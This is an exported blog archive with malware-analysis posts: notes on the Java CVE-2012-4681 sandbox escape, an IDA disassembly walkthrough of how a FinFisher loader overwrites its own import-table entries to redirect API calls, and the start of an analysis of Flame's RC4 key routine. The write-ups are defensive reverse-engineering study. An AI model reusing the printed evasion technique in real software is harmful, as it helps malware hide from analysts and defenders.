<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSMzIAaz5uSe1-tjxcvuAGtSrlGP8XqJMuGFDW0LdZAKjfoCzot7bkPq0OJW_2Qqt_QHwLQuEqR3EJxag2adyVRGoI7WrZ11vt9OlYiC8EpDLnLcidRfKDtdpfvUJQ-leWSDNvlRNTXkk/s1600/graph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" height="117" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSMzIAaz5uSe1-tjxcvuAGtSrlGP8XqJMuGFDW0LdZAKjfoCzot7bkPq0OJW_2Qqt_QHwLQuEqR3EJxag2adyVRGoI7WrZ11vt9OlYiC8EpDLnLcidRfKDtdpfvUJQ-leWSDNvlRNTXkk/s640/graph.png" width="640" /></span></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">So, even if version 1.6 allows the <i>sun.awt.SunToolkit</i> class to be obtained, it prevents it from accessing the private <i>Statement.acc</i> field, which seems correct. It seems that the bug is really in version 1.7, in the access to <i>Statement.acc</i>. Or maybe neither of the two is supposed to happen: <i>sun.awt.SunToolkit</i> must not be reachable from restricted code, and the <i>Statement.acc</i> field must not be accessible to anyone.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">I look forward to further results.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">*UPDATE* [28 August 2012]</span><br />
<span style="font-family: Verdana, sans-serif;">1) Now we can refer to the above vulnerability as "CVE-2012-4681".</span><br />
<span style="font-family: Verdana, sans-serif;">2) A new analysis, based on the same POC I documented, has been published today: <a href="http://thexploit.com/sec/java-facepalm-suntoolkit-getfield-vulnerability/">http://thexploit.com/sec/java-facepalm-suntoolkit-getfield-vulnerability/</a> . So, yes, it seems that <i>getField()</i> is the culprit, or at least it's one of them...</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<span style="font-family: Verdana, sans-serif;">*UPDATE 2* [28 August 2012]</span><br />
<span style="font-family: Verdana, sans-serif;">A more in-depth analysis is finally out: <a href="http://immunityproducts.blogspot.com.ar/2012/08/java-0day-analysis-cve-2012-4681.html">http://immunityproducts.blogspot.com.ar/2012/08/java-0day-analysis-cve-2012-4681.html</a></span><br />
<span style="font-family: Verdana, sans-serif;">As I thought, there are two different 0days: one that allows you to get a reference to the restricted class <i>sun.awt.SunToolkit</i>, and the other one (<i>getField()</i>) that lets you access a private field of a class. The missing detail (<i>ClassFinder</i>) is also explained: it is used in the internal implementation of the <i>execute()</i> method of the <i>Expression</i> object.</span><br />
<br />giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com0tag:blogger.com,1999:blog-8573685359056491736.post-38719094479269637132012-08-17T15:30:00.000-07:002012-11-24T06:57:53.154-08:00FinFish's trick... not so legendary!<span style="font-family: Verdana, sans-serif;">This post is about a trick that Finfish uses to appear (well, at least, "to try to appear"!) as a normal, non malicious program. </span><br />
<span style="font-family: Verdana, sans-serif;">First of all, you immediately notice that this sample is a simple loader: a look at the IDA navigation bar shows a tiny code section next to a huge resource section. </span><br />
<span style="font-family: Verdana, sans-serif;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuXNDPMCL9V_tKsUhH4LQlLY4O9KdW0vVtzXogIsxYeRdwEJeRXBegoPqJVGGAouyR74GAL96vlC9ZXK-hl0gW7FZ-WLUkop78gZJbdhPS0S5RsM5F82KqOL2bq0oG6iu9UCZSdZUxSho/s1600/bar.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuXNDPMCL9V_tKsUhH4LQlLY4O9KdW0vVtzXogIsxYeRdwEJeRXBegoPqJVGGAouyR74GAL96vlC9ZXK-hl0gW7FZ-WLUkop78gZJbdhPS0S5RsM5F82KqOL2bq0oG6iu9UCZSdZUxSho/s1600/bar.png" /></span></a></div>
<span style="font-family: Verdana, sans-serif;"><br />
<br />
This tells us that something is hidden in the resources. The payloads, in fact, are encrypted and stored in the dialog-type resources. </span><span style="font-family: Verdana, sans-serif;">Here's a quick check that shows that something is wrong with the dialog data: </span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsnmyFAf0iHrJSLXmJfdkgyIm08WRfHnmMqaWmp_0FotfR0_mVQZ-NdY5fjBWO7-9hAqu7GB1zX-0zSpvaKMs0bRzi_aPSVUJZG-GqfEJhWNKSsPm0c-1GsPlGqoHKuwG-LQ998faevuo/s1600/resource.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsnmyFAf0iHrJSLXmJfdkgyIm08WRfHnmMqaWmp_0FotfR0_mVQZ-NdY5fjBWO7-9hAqu7GB1zX-0zSpvaKMs0bRzi_aPSVUJZG-GqfEJhWNKSsPm0c-1GsPlGqoHKuwG-LQ998faevuo/s1600/resource.png" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">But let's go back to the curious trick we mentioned, and begin by analyzing the code. </span><span style="font-family: Verdana, sans-serif;">If we start looking from the entry point we notice... absolutely nothing! </span><br />
<span style="font-family: Verdana, sans-serif;">At first glance nothing suggests that we are analyzing malware, as we only go through some common API calls.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVFWfxh3zZ8AiGKsCrFdMM9XtvNIuFV44juYPozgy34WC1BREHxlLsKM-o0xo3JvrpKFy5KQzQCGueATa8W8npLV8c_OhXDjcbD0aRM_rJsmXJqe-ogN5vNtNx2MVV9gmmlK4zET23F9E/s1600/common_apis.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVFWfxh3zZ8AiGKsCrFdMM9XtvNIuFV44juYPozgy34WC1BREHxlLsKM-o0xo3JvrpKFy5KQzQCGueATa8W8npLV8c_OhXDjcbD0aRM_rJsmXJqe-ogN5vNtNx2MVV9gmmlK4zET23F9E/s1600/common_apis.png" /></a></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Of course, a deeper reading reveals the trick: in the middle of some legitimate calls we find a suspicious function. What caught my attention most is that it calls the <i>VirtualProtect</i> API several times, apparently without any good reason, as we will see later. </span><br />
<span style="font-family: Verdana, sans-serif;"><br />
For now let's start from the beginning:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">.text:004011F5 push 0 ; lpModuleName</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004011F7 call ds:GetModuleHandleW</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004011FD mov ebp, eax ; MZ header</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004011FF mov eax, [ebp+3Ch] ; MZ.elfanew = PE offset</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401202 mov esi, [eax+ebp+80h] ; import table RVA</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401209 mov eax, [esi+ebp+0Ch] ; import name RVA</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">This code gets the module handle of the application itself (the base address of its MZ header) and then reads the PE header offset (<i>e_lfanew</i>), the import table RVA, and the name RVA of the first import descriptor.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">.text:0040120D add esi, ebp ; virtual address of the image import descriptor</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401223 add eax, ebp</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401225 push offset aUser32_dll_0 ; "user32.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040122A push eax ; char *</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040122B call __stricmp</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401230 add esp, 8</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401237 add esi, 14h</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040123A mov [esp+18h+var_4], esi</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040123E jmp loc_4012E6</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012E6 mov eax, [esi+0Ch]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012E9 test eax, eax</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012EB jnz loc_401223</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Then the malware converts the RVAs of the first image import descriptor and of its name into virtual addresses, and loops over the import descriptors looking for "user32.dll".</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">.text:00401243 mov edi, [esi]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401245 mov esi, [esi+10h]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401248 mov eax, [edi+ebp]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040124B add edi, ebp</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040124D add esi, ebp</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401257 jmp short loc_401260</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401260 lea ecx, [eax+ebp+2] ; Name</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401264 push offset aRegisterclasse ; "RegisterClassExW"</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401269 push ecx ; char *</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040126A call __stricmp</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040126F add esp, 8</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401272 test eax, eax</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401274 jnz short loc_401297</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401297 mov edx, [edi]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401299 lea eax, [edx+ebp+2]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040129D push offset aCreatewindowex ; "CreateWindowExW"</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012A2 push eax ; char *</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012A3 call __stricmp</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012A8 add esp, 8</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012AB test eax, eax</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012AD jnz short loc_4012D0</span><br />
<span style="font-family: Courier New, Courier, monospace;">...</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012D0 mov eax, [edi+4]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012D3 add edi, 4</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012D6 add esi, 4</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012D9 test eax, eax</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012DB jnz short loc_401260</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Here the code saves the contents of the <i>OriginalFirstThunk</i> and <i>FirstThunk</i> fields of the <i>IMAGE_IMPORT_DESCRIPTOR</i>. Then it loops over every <i>IMAGE_IMPORT_BY_NAME</i>.<i>Name</i> looking for the <i>RegisterClassExW</i> and <i>CreateWindowExW</i> APIs.</span><br />
<span style="font-family: Verdana, sans-serif;"><br />
Once they are found it does the following:</span><br />
<span style="font-family: Verdana, sans-serif;"><br />
[RegisterClassExW]</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401276 lea edx, [esp+18h+flOldProtect]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040127A push edx ; lpflOldProtect</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040127B push 40h ; flNewProtect</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040127D push 4 ; dwSize</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040127F push esi ; lpAddress</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401280 call ebx ; VirtualProtect</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401282 lea eax, [esp+18h+flOldProtect]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401286 push eax ; lpflOldProtect</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401287 mov dword ptr [esi], offset BadFunc1 ; FirstThunk overwrite</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:0040128D mov ecx, [esp+1Ch+flOldProtect]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401291 push ecx ; flNewProtect</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401292 push 4 ; dwSize</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401294 push esi ; lpAddress</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:00401295 call ebx ; VirtualProtect</span><br />
<span style="font-family: Verdana, sans-serif;"><br />
<br />
[CreateWindowExW]</span><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012AF lea ecx, [esp+18h+flOldProtect]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012B3 push ecx ; lpflOldProtect</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012B4 push 40h ; flNewProtect</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012B6 push 4 ; dwSize</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012B8 push esi ; lpAddress</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012B9 call ebx ; VirtualProtect</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012BB lea edx, [esp+18h+flOldProtect]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012BF push edx ; lpflOldProtect</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012C0 mov dword ptr [esi], offset BadFunc2 ; FirstThunk overwrite</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012C6 mov eax, [esp+1Ch+flOldProtect]</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012CA push eax ; flNewProtect</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012CB push 4 ; dwSize</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012CD push esi ; lpAddress</span><br />
<span style="font-family: Courier New, Courier, monospace;">.text:004012CE call ebx ; VirtualProtect</span><br />
<span style="font-family: Verdana, sans-serif;"><br />
<br />
Basically, it makes the memory holding the import address writable with the <i>VirtualProtect</i> API, overwrites the <i>FirstThunk</i> entries of the <i>RegisterClassExW</i> and <i>CreateWindowExW</i> APIs with the addresses of its own malicious routines, and then calls <i>VirtualProtect</i> again to restore the old protection.</span><br />
<span style="font-family: Verdana, sans-serif;">In this way, every time one of these APIs is called the real API is not executed; instead, the code located at the malicious address runs. Even when debugging, if we don't step into the calls, nothing suggests that control flow is being hijacked.</span><br />
<span style="font-family: Verdana, sans-serif;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjGvbKlQ7wY8MjCIEE3vejNvKUhVb4CVJGA8J3vTFfzxozXl4sQZ26vPDwNdg6zd8QdkrJBM1JfftDWFQcmmVyDv20h05c58lob-l6p4asFAusEKNDf09eK6pAPdfevf-qOUyAxzxnhq8/s1600/RegisterClassExW.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Verdana, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjGvbKlQ7wY8MjCIEE3vejNvKUhVb4CVJGA8J3vTFfzxozXl4sQZ26vPDwNdg6zd8QdkrJBM1JfftDWFQcmmVyDv20h05c58lob-l6p4asFAusEKNDf09eK6pAPdfevf-qOUyAxzxnhq8/s1600/RegisterClassExW.png" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcd-WgVUk_5csfnOm0Xs9VX4XAg0RK4JV-YL-qbSCJFPKZDwa5tDjTMKzsJ294zyWFJ1ihpn8hZFQAPze8O1EJpbVVcogobdaG7NIJCgoy36Ld0f3VHFK1qe3jtZpQltw5hhmOKqf_aJw/s1600/CreateWindowExW.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcd-WgVUk_5csfnOm0Xs9VX4XAg0RK4JV-YL-qbSCJFPKZDwa5tDjTMKzsJ294zyWFJ1ihpn8hZFQAPze8O1EJpbVVcogobdaG7NIJCgoy36Ld0f3VHFK1qe3jtZpQltw5hhmOKqf_aJw/s1600/CreateWindowExW.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<span style="font-family: Verdana, sans-serif;"><br />
As we can see, the calls above look like normal, legitimate calls, but they are actually redirected to the malicious routines. And here is the trick in action in the debugger:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA_NzAPcT9KBJ4KQ2FEnawYqMCzmYuSbF8HPTipxO_NZv3i7-2f6RupNPjY2P-YxNv6Akl6xLEkId0xkp-4HvZrFBq70V45gbmPhxNT8Zk1vyK-e1Gt8mxE3TO2XKEhSyRCNzzUaPAr_U/s1600/deb_reg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA_NzAPcT9KBJ4KQ2FEnawYqMCzmYuSbF8HPTipxO_NZv3i7-2f6RupNPjY2P-YxNv6Akl6xLEkId0xkp-4HvZrFBq70V45gbmPhxNT8Zk1vyK-e1Gt8mxE3TO2XKEhSyRCNzzUaPAr_U/s1600/deb_reg.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYJhU2zMI62GJyvNM5URjtnuGurJiazVb025fViUtq6M35-OcSVHkggOdn4obQ9SQhrDx-9-5HIYAfnEQYu_Vd7ihCI851D9_UfwkvGnar8BW9ySb8IqKaok_BXorfWQGsGVE1jmsUjRM/s1600/deb_create.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYJhU2zMI62GJyvNM5URjtnuGurJiazVb025fViUtq6M35-OcSVHkggOdn4obQ9SQhrDx-9-5HIYAfnEQYu_Vd7ihCI851D9_UfwkvGnar8BW9ySb8IqKaok_BXorfWQGsGVE1jmsUjRM/s1600/deb_create.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">Note that this is not API hooking but only a simple trick that works within the executable itself: it is not the API code that gets overwritten, but the <i>FirstThunk</i> of the malicious executable.</span><br />
<span style="font-family: Verdana, sans-serif;"><br />
What can I say... It's not a very advanced deception trick, but a curious one at least: come on guys, you can do better!</span>
giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com2tag:blogger.com,1999:blog-8573685359056491736.post-9908242659806466432012-06-11T17:47:00.000-07:002012-06-11T18:52:05.596-07:00Why Flame is a pain to analyze - a look at its intricate compilation style.
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: large;"><u>Introduction</u></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This post is about some peculiarities of the assembly code of Flame, the malware infiltrating Iranian computers. Note that I'm not going to give you any additional details or new findings about its analysis; if you are interested in this kind of stuff I suggest you read the <a href="http://www.crysys.hu/skywiper/skywiper.pdf">report written by CrySyS</a>, which is by far the most comprehensive available description of its different components.</span><br />
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Aside from that, it should be noted that although the main functionalities of Flame have been identified, there is still a lot of undocumented code. So I hope that, for those of you who want to perform your own analysis, it will be helpful to understand more about its compilation style; that is why I'm writing these little notes.</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">To do that, I decided to discuss a specific routine in the "advnetcfg.ocx" file: the RC4 encryption routine. In particular, I focused on retrieving the key.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Although I'm not the first one to find it, as it also appears in the CrySyS report cited above (which does not describe the procedure), the aim of this post is to show you how a standard task like that is made intricate and time-consuming by the compilation style.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This is only one example that highlights this kind of code structure, which you will find all over the malware. Of course, this isn't the only peculiarity that makes its code harder to understand: maybe there will be a sequel to continue this discussion.</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">First, we will describe how to deal with the RC4 algorithm in order to identify which parameter is used for the key. Even knowing that, however, it won't be enough to find its content directly, and we will have to go through some intricate code to finally reveal its value.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Let's get it started.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><u><span class="Apple-style-span" style="font-size: large;">Analyzing RC4</span></u></span><br />
<div style="text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Looking at the code, we notice the following loop:</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"> <span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span> </span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: 11px;"><span class="Apple-style-span" style="font-size: small;"> .<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1002598F</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov [eax+ecx], al</span></span></span></div>
<div>
<div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10025992</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> inc eax</span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10025993</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> cmp eax, </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">100</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">h</span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">.text:</span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10025998</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> jl </span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">short</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> loc_1002598F</span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This is a typical hint for recognizing the RC4 algorithm: it fills a 0x100 (= 256 decimal) byte array with the values 0..255, which is the initial permutation box. Just compare it with one of the RC4 source codes available online (<a href="http://freebsd.active-venture.com/FreeBSD-srctree/newsrc/crypto/rc4/rc4.c.html">this</a>, for instance), and look for the assembly-to-C correspondence:</span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="white-space: pre;"><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"></span></span><span class="Apple-style-span" style="white-space: pre;"><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">for</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"> (i = </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">0</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">; i < </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">256</span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">; i++)</span></span></span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"></span></span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace; font-size: small; white-space: pre;"> state->perm[i] = (u_char)i;</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><br />
